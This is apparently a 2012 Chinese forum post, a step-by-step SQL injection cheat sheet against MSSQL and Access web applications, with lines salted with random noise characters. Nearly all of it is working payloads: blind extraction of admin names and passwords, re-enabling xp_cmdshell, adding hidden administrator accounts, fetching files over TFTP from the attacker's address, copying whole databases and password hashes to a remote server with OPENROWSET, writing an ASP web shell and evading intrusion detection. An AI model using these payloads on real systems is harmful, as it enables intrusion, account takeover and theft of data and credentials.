1..判断有无注入点 4 V* E7 |* p4 z2 i9 v5 z
; and 1=1 and 1=2 ) Y0 G- ?+ P* _# w
# x. h- ?8 n* B; K6 B/ [
$ r; B) v" F7 e1 q
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
) w' X. S5 H! b, c& i1 Y3 Kand 0<>(select count(*) from *)
+ J: Q) D0 m: v0 n+ E: I/ {and 0<>(select count(*) from admin) ---判断是否存在admin这张表 / B2 T3 {) S0 M
& S3 c- p& P# V- w9 q
# F2 ]( f$ A v4 a' j3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 7 B T* ?7 k1 B/ h. s5 m5 a
and 0<(select count(*) from admin)
/ e7 M& k- v9 Gand 1<(select count(*) from admin) : o( a/ N3 f! K* Z! S1 Y
猜列名还有 and (select count(列名) from 表名)>0
! a$ N4 J$ m" R1 M2 A! v
, g/ u- l! a, G: j) C
& a5 z2 [9 z% V4 H, t& b; d/ q4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. ; x& o8 ^7 r- v R
and 1=(select count(*) from admin where len(*)>0)-- 9 f1 Q6 @5 R6 t0 @ k9 t& x
and 1=(select count(*) from admin where len(用户字段名称name)>0)
% H0 l( N) E/ pand 1=(select count(*) from admin where len(密码字段名称password)>0) " G1 q8 y" }1 t: M7 n8 Z
7 B1 f1 V& a$ y& N7 R5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 . i+ l) l9 w+ {7 d0 V
and 1=(select count(*) from admin where len(*)>0) 7 J. d& x3 k ^7 N8 O
and 1=(select count(*) from admin where len(name)>6) 错误
. t" ^1 f" J9 F/ e) a: Dand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 l" T! }$ E6 q. P
and 1=(select count(*) from admin where len(name)=6) 正确 " u, z* m; t4 t( ]/ n4 m
" V$ w) t3 {: H5 X# H
and 1=(select count(*) from admin where len(password)>11) 正确
) d* X- [* |1 Vand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
1 m, M/ X- V2 f6 }and 1=(select count(*) from admin where len(password)=12) 正确 ) L; P/ W6 V" K& R! Z& U
猜长度还有 and (select top 1 len(username) from admin)>5
. g' \! t7 g& J3 @% W* p$ N ^6 w6 U. [" I; R! K3 c5 t! |8 p6 R
; m7 Q" R6 S$ X! w% M1 _4 o% O3 C
6.猜解字符
, \3 ]1 F0 o& W0 A! eand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
* E" R4 {* F; [( @9 R o' r+ w! P: K' Z! Rand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
, |8 l- P$ O( J3 e% c就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
0 U/ W) ]9 B, R( D2 l
( u# F9 r a5 [猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算
: `& M4 M1 t3 R6 \2 Y9 Iand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 7 H4 J/ A! R4 F7 ~6 S6 @
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
8 Q: c/ v- @2 x% ^1 Z+ l$ _
. t, ^) K- ?# J4 b6 T2 b, Z& mgroup by users.id having 1=1-- / p9 [8 r3 w) E2 ~- d
group by users.id, users.username, users.password, users.privs having 1=1-- . @+ G0 j3 u1 Q) E
; insert into users values( 666, attacker, foobar, 0xffff )-- 5 t6 Z" ^3 d( ]
% j _1 m0 Z) h2 C8 g5 C) ~UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- 7 `: e O3 y* {* k! }- f- \
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- _. I) U# H: \' D: u' E
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- & K: N: o" ~' N+ v) c% x3 Y
UNION SELECT TOP 1 login_name FROM logintable-
4 E/ W( W. I6 o1 J [( OUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
0 E6 \& j- ]% E% Y9 _# J
, d0 ~- d5 Q5 J7 c7 [看服务器打的补丁=出错了打了SP4补丁
* m- U6 f) v4 \/ @6 {and 1=(select @@VERSION)-- 2 z! k% x' j7 f0 l+ ]% R
& q$ |! {( p% R B. m0 @看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
( ]! k6 ], ?. w7 Hand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
' B @* E* |. f2 g
7 L* a. G( t' m判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
! G& O* m$ s0 l. Y' |, J. t* ^and sa=(SELECT System_user)--
2 M7 C; X4 d& ?# @- W0 G8 Hand user_name()=dbo-- + {& R u- V1 N9 G3 O
and 0<>(select user_name()-- 6 M# |: z) g! H9 D9 F
1 {2 o; l/ {( y9 Q& E' V看xp_cmdshell是否删除 * O7 N! k( v8 H# v4 ~
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
. z( J4 @( V: o3 K# k( {+ O. u W3 T* ^/ B! U3 [
xp_cmdshell被删除,恢复,支持绝对路径的恢复
/ a# T. |: X3 z$ \2 a, r;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- . h1 e6 D2 ^" L3 f; i
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
9 {' U3 q9 o3 U; j. H2 o8 h; q e" Q6 T: `7 U
反向PING自己实验 # ?7 t# f+ O- h; H8 P" R
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 6 S2 G" g% z7 m* h2 R! ~0 f5 \6 t2 [
: k3 _# v! p5 @9 m% i
加帐号 5 `4 P- m' V* l6 g1 e- m
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- 9 r- u4 {2 [# R
) }+ w, N$ Z6 m
创建一个虚拟目录E盘: 0 J- G" }- s5 s; w( K$ a
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
$ x, r7 d- X4 n5 @$ S9 H( V& O7 p, |# }( U& `
访问属性:(配合写入一个webshell)
3 T% @0 V" ?* {/ _( Jdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse . Q. x7 F- R# q. z$ {# h4 ]
( m" ~4 u, v7 [- M% }5 f5 p; N; l% Q& f
* S3 c6 \0 ?; r
MSSQL也可以用联合查询
5 Q. f/ s( a `6 I. w?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin + ], I$ u( [; ?& H# A
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) Y* N. y5 J- ^0 Z1 m) j' c
- N2 Z! W1 ~! W0 ~6 h' S7 R! K1 t
' l" Q. b$ v# N1 b- A1 ^2 \爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
* a( @1 Z3 f$ e8 Y# J( u
+ Z. I* ^: }+ Z3 I4 @
7 G) D8 E+ }3 X* Q5 q6 h
8 v8 k( T' R; f9 y+ q; j$ V得到WEB路径
( |5 X/ `2 f- Q9 _;create table [dbo].[swap] ([swappass][char](255));--
F9 H$ R% C0 u. C. F5 K; Q7 Jand (select top 1 swappass from swap)=1-- 4 ~! \" Y7 `7 w9 l, E# `4 \- Z' m
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- 7 \# l9 ]+ F8 w, _0 Q$ L) z
;use ku1;-- * g/ E) _9 n6 T' U) J( x2 F7 C
;create table cmd (str image);-- 建立image类型的表cmd
/ e+ I! [: W4 L& H$ z9 U9 [, Q- O' K3 G6 i# U' O! ~! ~
存在xp_cmdshell的测试过程: ' ?) \, [& d0 q, u9 U6 b) h, K* B
;exec master..xp_cmdshell dir % E$ [* Q; J# u) }
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
6 `( i# q$ W# A3 _& W( A;exec master.dbo.sp_password null,jiaoniang$,1866574;-- 9 W6 i( T7 J/ a3 R2 C( ]7 M
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- - _( M5 G( u% B0 c
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
) {/ s' m O7 l0 L' a$ W3 w;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- ! a, J! ]# ~: O; U( Z1 Z% J
exec master..xp_servicecontrol start, schedule 启动服务 1 S$ B: \( j. [' ?( {. ]
exec master..xp_servicecontrol start, server
' \0 E7 g8 D, B5 l# Q" r5 p8 B N! r/ }; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add 2 l5 a- S% k$ T, |
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
. j) s, H# @" a5 l" i; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 0 o" w, ^; p! m6 y7 R
# v7 |2 r$ }/ m1 O0 `
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 9 Z. H) {+ U2 f3 p: i
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ + J4 b3 T9 \5 G) ^
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat / E9 m2 a T9 l+ G
如果被限制则可以。
; f5 a% N$ Z( x( {1 G" R. \select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
: }3 E2 o$ s. v1 u
( w% K4 e: y& J# Y7 X( K查询构造:
( d3 y" y+ L9 o8 RSELECT * FROM news WHERE id=... AND topic=... AND ..... 8 `, S9 \2 ~ b+ I" I. O3 y: Q- N
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
5 t# p/ s) v; Iselect 123;-- / l0 g' |$ j" X, U' n" @+ O
;use master;-- ; x4 N9 G* w' w8 U3 {, Q
:a or name like fff%;-- 显示有一个叫ffff的用户哈。 ( ^ T) K( H0 A7 B8 j+ t& V1 g
and 1<>(select count(email) from [user]);-- 2 H7 z6 S+ Y! d, w1 Z
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
! T! D0 R' a& k! Z; l;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- + O7 A# y( ~3 X U
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
$ _( `/ I7 K& }5 ^! M3 K;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- 3 @+ @# `4 b: N& J7 d8 I2 |8 F
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
* e3 h6 E Z& v( m' v1 A;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
. q0 X9 k4 n2 B3 O上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
; x0 c" s" m) M% G通过查看ffff的用户资料可得第一个用表叫ad
/ |; L' E# r( O D1 ], b3 S然后根据表名ad得到这个表的ID 得到第二个表的名字
- A# X, F0 F3 m3 S" W5 h3 q0 V9 X1 {$ {' U
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
" R2 N9 G1 u, i; l6 Z: ?* M' P finsert into users values( 667,123,123,0xffff)--
# A( }. H% C# |# m* K2 O/ P4 l+ Linsert into users values ( 123, admin--, password, 0xffff)-- ) W7 }' |. ]) }3 V* O7 O% i
;and user>0 ! h- r7 m$ T1 j _
;and (select count(*) from sysobjects)>0
% k" z: h! C; g;and (select count(*) from mysysobjects)>0 //为access数据库 0 w+ X3 F6 {( {3 \
, z7 E. Z5 K1 X* f. |/ G2 \3 c枚举出数据表名 5 f5 V, f" C2 @/ N/ d
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- 4 W, e" [) T) h$ n0 P
这是将第一个表名更新到aaa的字段处。 ; C8 i. ^, V! U$ X
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 0 @" D4 J, W2 }' \9 |
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- + j! M" K- {0 _! ?3 W! K5 L( e
然后id=1552 and exists(select * from aaa where aaa>5)
, C- d- @% d, Y8 X$ R" g读出第二个表,一个个的读出,直到没有为止。 + x0 h& }% t5 o5 }
读字段是这样: . v/ H* h. L: s% Q& I2 c: a( J
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
4 T; F! I" H, Y' w2 u/ I1 K然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 + ?" g+ A; n& v& L- c$ c
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
; k; o3 q. p' j I然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
: M, L/ ?# T" ^. y8 g) B/ ~4 ~& G
+ f9 K, g% |7 y' c2 q[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] D2 t1 X/ V* c' ]- c# ~' R. n' M
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
8 ^0 ^& @: `" U通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
p0 h @8 E( U7 x
4 |; {' r* D) S3 a+ L) \) ^9 Y, q[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] & s6 _( r' m3 J, @: X
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
! k" F& M% D$ p4 z) b9 h, ^6 P& I: @
绕过IDS的检测[使用变量]
( t' G* S i& ~# d: C# ?9 V; g. W6 a6 f3 r;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ / k( y, ~1 o5 f. |, U$ y
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ 9 e# h9 [' A) K) {$ ^, N6 B
5 P, i# N5 Z4 i% y0 {7 Z$ X3 |" s1、 开启远程数据库 ' c: j7 [7 n" G3 s' M
基本语法 & O. v7 q; K- d- @1 ~! V* T
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) 3 w3 {5 m3 O; f* Q
参数: (1) OLEDB Provider name 1 O& X1 v7 H0 N+ ?8 R: ]8 C
2、 其中连接字符串参数可以是任何端口用来连接,比如
# b" V( @* G3 ?" zselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table ) Q7 j! H1 u7 j0 |7 |
3.复制目标主机的整个数据库insert所有远程表到本地表。 4 d( |6 W" D4 ?' }' U4 f. B/ c
! g5 D: g% M8 n, _
基本语法:
" a1 B8 w" r# |, `! j+ z5 Linsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
- ?! g! D, D i* o% K' w0 G这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
" M( P( g, [; K. K6 i* _insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
. P. ]$ x- |- d0 y/ h7 y5 q3 I! Sinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
; x! a! s& A6 aselect * from master.dbo.sysdatabases 7 o, [; N/ B4 c& A: N2 ]) D
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
8 o5 [7 ?# i8 l; E3 l, I; bselect * from user_database.dbo.sysobjects 9 n6 m- z' i6 `. F
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 0 C$ Z0 ?& e; E5 A* P5 z& Z
select * from user_database.dbo.syscolumns |5 {, H. V. V8 a' v7 ~
复制数据库:
8 j; [9 s3 n, _8 P: ^! finsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
4 B2 X% X, n% I# _7 }! x, binsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 : \( |& s, B. |6 P3 W
7 F1 O6 n: B7 R; E, y* {
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: 5 {4 q: }8 i4 z( f. S u! W3 ~
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
: f/ g3 s+ P, }: C/ W7 d; W7 `- n得到hash之后,就可以进行暴力破解。
2 {7 X+ M3 O9 R% Q$ ? A% T' L
8 a m+ l0 `, n9 Z# p2 S& x遍历目录的方法: 先创建一个临时表:temp
1 s; v- M( e! y" ~! \6 ^8 b* e;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6 Y- p" u# Y. y5 V0 I; H; P& U
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
. S2 p( k5 A ]& x; I;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
8 u# c; N+ E% N8 Y. Z;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
! \0 z3 t1 a: i+ A;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
4 n6 {2 s8 K8 m2 C/ J; W, h5 @;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
g# u8 f9 h" _. Q;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- : B+ y. n# {- m
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
, n+ s8 n) n1 K9 {; u Q% |2 ]0 {;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) * N" i$ Z" t# J# F
写入表:
C4 N' r" L4 ~ e: l( x: S语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- + ?" X* l3 N7 z: d7 `. E
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- " T( d8 L/ ~* R+ G* ?
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
! p- }: b' D4 X: U* W语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 9 {0 \3 {1 A2 @" R8 _$ c9 w6 _
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- . X! M/ n- |1 w4 ~
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- 1 z8 U3 I8 R4 n* o. y. [9 }( [
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 5 l+ x" s% o7 R0 K+ B
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- - l2 H# Y! k* }4 O. X
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- 7 w5 G( K' R# H1 h F; Y( b; U
1 F. S [7 x* h Q7 ?. C把路径写到表中去: i$ T8 T& M8 n
;create table dirs(paths varchar(100), id int)-- # d9 b* n: P% |- b) z7 ?: k1 n7 k
;insert dirs exec master.dbo.xp_dirtree c:\-- 5 M0 S* G. s8 o% a! y V5 X- ~
and 0<>(select top 1 paths from dirs)-- ) `2 n8 ]5 g R0 d$ S
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- * h" R. P5 P+ D' e. G5 x
;create table dirs1(paths varchar(100), id int)--
% \8 }' ^6 _9 V D;insert dirs exec master.dbo.xp_dirtree e:\web--
( ?8 B& M# d2 d/ pand 0<>(select top 1 paths from dirs1)--
7 [9 N. h: o; T4 E; V# z/ ^) ^4 H; |0 P3 m9 ^# |+ O" A
把数据库备份到网页目录:下载
i9 J; _, w3 k( P;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
( c% z1 Q6 k0 I" I2 s ~; W
9 d, {6 I- r5 J4 ^and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 7 Y. O" z# Z( T3 Q/ L( r
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
C: c6 u, o e q. @& f4 aand 1=(select user_id from USER_LOGIN)
" _3 N0 Y5 |, b v0 Z# |- [5 tand 0=(select user from USER_LOGIN where user>1)
# X; X% i) u9 @' L: U; ~
8 J8 u. E- A3 {4 B$ ]-=- wscript.shell example -=-
6 o7 E# o" X: d! N4 Edeclare @o int ! ~) U9 m! F i
exec sp_oacreate wscript.shell, @o out 7 M2 C5 V" b3 V
exec sp_oamethod @o, run, NULL, notepad.exe
3 ?& V8 J3 y& b2 }7 b- x; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- , H2 I1 s" c8 F' |8 m
9 m% J; i: X3 Cdeclare @o int, @f int, @t int, @ret int
3 K+ n6 O' K6 k z& Wdeclare @line varchar(8000) ' X1 t3 f8 v- A0 n6 v
exec sp_oacreate scripting.filesystemobject, @o out - \8 a U; ^/ q" ^" U6 V
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
* Y) ^% H, @+ K* K' T9 t! oexec @ret = sp_oamethod @f, readline, @line out
6 e9 D' X1 u M' A: I. B# O8 Kwhile( @ret = 0 )
0 {/ h/ [$ X$ m, T2 h4 rbegin
3 {3 C0 B6 I8 ]) a/ xprint @line * V6 W. u( F0 I% i4 F6 K
exec @ret = sp_oamethod @f, readline, @line out
& J7 ~4 p X% A9 Q$ p) wend 0 _0 Q: ?) R8 N! t5 m* B) n
# M% A' ~, O7 ?declare @o int, @f int, @t int, @ret int
! I* x9 \) q0 a7 v% dexec sp_oacreate scripting.filesystemobject, @o out
6 D6 z! x% H' l9 p; K% K bexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 0 Y) g \; X/ k" N9 l- V# L) _
exec @ret = sp_oamethod @f, writeline, NULL, $ d# Y/ l4 ^1 N$ L+ q' a! c) ^
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
2 Z% i7 w" K8 r6 A2 u* {, h5 T8 `; Q! s; t i
declare @o int, @ret int
4 ]' A1 X; C2 z% f5 z. vexec sp_oacreate speech.voicetext, @o out
; X2 s. Y3 y4 ~% d3 P9 l" ]" Vexec sp_oamethod @o, register, NULL, foo, bar
# ^" B7 Y8 f' E( E$ z" _" Nexec sp_oasetproperty @o, speed, 150
1 }: q; s) I1 y* B1 s1 {2 aexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
; D6 [% \8 X) V4 s( qwaitfor delay 00:00:05 + z* p! }1 ~# h# j2 B5 `) ?( Z* ~
1 s* j; h1 j7 \& ~" o2 W; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 9 i- h& f5 W% _' x/ f" Y+ w
3 g% p& q" i; i1 o# ~
xp_dirtree适用权限PUBLIC 2 x r" A% p0 i4 o: l, X
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
3 E# [; C! Y G. e+ f, ]create table dirs(paths varchar(100), id int)
0 S$ D1 b1 `; P A: Y o建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 3 b9 J0 `, ^/ [
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息! f: j6 f" V- |: H! B8 z$ M0 m
|
发表于 2012-9-15 14:32:40
收藏
支持
反对